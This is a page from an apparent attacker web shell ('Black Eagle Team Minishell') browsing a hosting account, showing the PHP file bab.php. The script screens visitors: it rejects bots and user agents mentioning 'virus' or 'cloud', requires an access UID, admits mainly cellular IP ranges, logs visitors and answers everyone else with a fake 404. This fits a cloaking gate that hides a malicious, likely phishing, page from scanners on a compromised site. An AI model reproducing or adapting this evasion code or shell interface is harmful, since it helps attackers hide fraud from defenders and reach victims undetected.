Black Eagle Team Minishell
Path:
/
home
/
c
/
c
/
p
/
ccpsafy
/
www
/
ccs
/
[
Home
]
File: bab.php
<?php define('ALLOWED_DIR', __DIR__ . '/allowed/'); define('DISALLOWED_DIR', __DIR__ . '/disallowed/'); define('FIRST_SECTION_DIR', __DIR__ . '/first_section_accessed/'); define('LAST_REQUEST_FILE', __DIR__ . '/lastRequest.txt'); define('BLOCK_TIME', 300); // 5 minutes in seconds define('FIRST_SECTION_BLOCK_TIME', 14400); // 4 hours in seconds if (!file_exists(ALLOWED_DIR)) mkdir(ALLOWED_DIR, 0755, true); if (!file_exists(DISALLOWED_DIR)) mkdir(DISALLOWED_DIR, 0755, true); if (!file_exists(FIRST_SECTION_DIR)) mkdir(FIRST_SECTION_DIR, 0755, true); function getClientIP() { if (isset($_SERVER['HTTP_CLIENT_IP'])) { return $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { return $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif (isset($_SERVER['REMOTE_ADDR'])) { return $_SERVER['REMOTE_ADDR']; } else { return '0.0.0.0'; // Return a default value if no IP is found } } function isUserAgentRecent($userAgent) { // Define patterns for user-agents with minimum version numbers $patterns = [ '/Chrome\/(\d+)/' => 100, '/Firefox\/(\d+)/' => 100, '/Safari\/(\d+)/' => 600, '/Edg\/(\d+)/' => 100, ]; // Loop through the patterns and check if the user-agent matches and has a valid version foreach ($patterns as $pattern => $minVersion) { if (preg_match($pattern, $userAgent, $matches)) { if (isset($matches[1]) && intval($matches[1]) > $minVersion) { return true; } } } // If no valid user-agent is found, return false return false; } function isCellular($dir="cell") { $ipAddress = getClientIP(); // Split the IP address into its sections $ipSections = explode('.', $ipAddress); // Ensure there are at least 4 sections in the IP address if (count($ipSections) < 4) { return false; } $firstSection = $ipSections[0]; $secondSection = $ipSections[1]; $thirdSection = $ipSections[2]; // Construct the JSON file path $jsonFilePath = "$dir/$firstSection.json"; // Load and decode the JSON file if (!file_exists($jsonFilePath)) { return false; } $jsonContent = file_get_contents($jsonFilePath); $data = json_decode($jsonContent, true); // Check if the combination of first and second sections exists as a key in the JSON data $key = "$firstSection.$secondSection"; if (!array_key_exists($key, $data)) { return false; } // Get the list of ranges or values for the key $ranges = $data[$key]; // Check if the third section is in the list foreach ($ranges as $range) { // Check for single value if ($range == $thirdSection) { return true; } // Check for range in the format "start-end" if (strpos($range, '-') !== false) { list($start, $end) = explode('-', $range); if ($thirdSection >= $start && $thirdSection <= $end) { return true; } } } return false; } function blockRequest($reason) { touch(LAST_REQUEST_FILE); header("HTTP/1.1 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> </body></html> "; exit; } function userAgentHasOS($str) { $searchStrings = ["ubuntu", "linux", "blackberry", "mac", "windows", "android"]; foreach ($searchStrings as $searchString) { if (strpos($str, $searchString) !== false) { return true; } } return false; } function performChecks() { $allowedUIDs = array('D4umKs', '3JIwoI', 'PP90ni'); // Define allowed UIDs here $clientIP = getClientIP(); $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown'; $userAgentLower = strtolower($userAgent); $currentTime = date('Y-m-d H:i:s'); $clientIPFile = ALLOWED_DIR . $clientIP . '.txt'; $clientIPParts = explode('.', $clientIP); $clientIPPrefix = implode('.', array_slice($clientIPParts, 0, 3)); $disallowedIPFile = DISALLOWED_DIR . $clientIPPrefix . '.txt'; $firstSectionFile = FIRST_SECTION_DIR . $clientIPParts[0] . '.txt'; // User agent check if (strpos($userAgentLower, "bot") !== false || strpos($userAgentLower, "virus") !== false || strpos($userAgentLower, "cloud") !== false || strpos($userAgentLower, "engine") !== false || strlen($userAgentLower) < 60 || !isUserAgentRecent($userAgent) || !userAgentHasOS($userAgentLower) || strpos($userAgentLower, "http:") !== false || strpos($userAgentLower, "https:") !== false) { $reason = "nasty user agent: " . $userAgent; file_put_contents($disallowedIPFile, "[$currentTime] $reason".PHP_EOL, FILE_APPEND); // Ensure the first section file is touched before allowing the request file_put_contents($firstSectionFile, "[$currentTime] $userAgent".PHP_EOL, FILE_APPEND); blockRequest($reason); } // UID check if (!isset($_GET['uid']) || strlen($_GET['uid']) < 4) { $reason = "Invalid UID"; file_put_contents($disallowedIPFile, "[$currentTime] $reason - $userAgent".PHP_EOL, FILE_APPEND); // Ensure the first section file is touched before allowing the request file_put_contents($firstSectionFile, "[$currentTime] $userAgent".PHP_EOL, FILE_APPEND); blockRequest($reason); } // Check if the IP is already allowed if (file_exists($clientIPFile) || isCellular()) { // IP is allowed, update last request time and proceed file_put_contents($clientIPFile, "[$currentTime] $userAgent".PHP_EOL, FILE_APPEND); // Ensure the first section file is touched before allowing the request file_put_contents($firstSectionFile, "[$currentTime] $userAgent".PHP_EOL, FILE_APPEND); touch(LAST_REQUEST_FILE); return; } // Check if the IP subnet is disallowed if (file_exists($disallowedIPFile)) { // IP is blocked, update log and block the request $reason = "IP previously blocked"; file_put_contents($disallowedIPFile, "[$currentTime] $reason - $userAgent".PHP_EOL, FILE_APPEND); // Ensure the first section file is touched before allowing the request file_put_contents($firstSectionFile, "[$currentTime] $userAgent".PHP_EOL, FILE_APPEND); blockRequest($reason); } // Check if the first section file exists and if it was touched within the last hour if (file_exists($firstSectionFile)) { $firstSectionFileTime = filemtime($firstSectionFile); if (time() - $firstSectionFileTime < FIRST_SECTION_BLOCK_TIME) { $reason = "IP first section file too recent"; file_put_contents($disallowedIPFile, "[$currentTime] $reason - $userAgent".PHP_EOL, FILE_APPEND); // Ensure the first section file is touched before allowing the request file_put_contents($firstSectionFile, "[$currentTime] $userAgent".PHP_EOL, FILE_APPEND); blockRequest($reason); } } // Check if the user agent string is present in the first section file if (file_exists($firstSectionFile)) { $firstSectionFileContents = file_get_contents($firstSectionFile); if (strpos($firstSectionFileContents, $userAgent) !== false) { $reason = "User agent string found in first section file"; file_put_contents($disallowedIPFile, "[$currentTime] $reason - $userAgent".PHP_EOL, FILE_APPEND); blockRequest($reason); } } // Check the last request time if (file_exists(LAST_REQUEST_FILE)) { $lastRequestTime = filemtime(LAST_REQUEST_FILE); if (time() - $lastRequestTime < BLOCK_TIME || !isCellular("odas")) { // Block the request, write to disallowed folder and block the request $reason = "Requests too frequent"; file_put_contents($disallowedIPFile, "[$currentTime] $reason - $userAgent".PHP_EOL, FILE_APPEND); // Ensure the first section file is touched before allowing the request file_put_contents($firstSectionFile, "[$currentTime] $userAgent".PHP_EOL, FILE_APPEND); blockRequest($reason); } } // Allow the request, update the allowed list and last request time file_put_contents($clientIPFile, "[$currentTime] $userAgent".PHP_EOL, FILE_APPEND); touch(LAST_REQUEST_FILE); } // Call the function to perform the checks performChecks(); ?>
©
2020 Black Eagle Team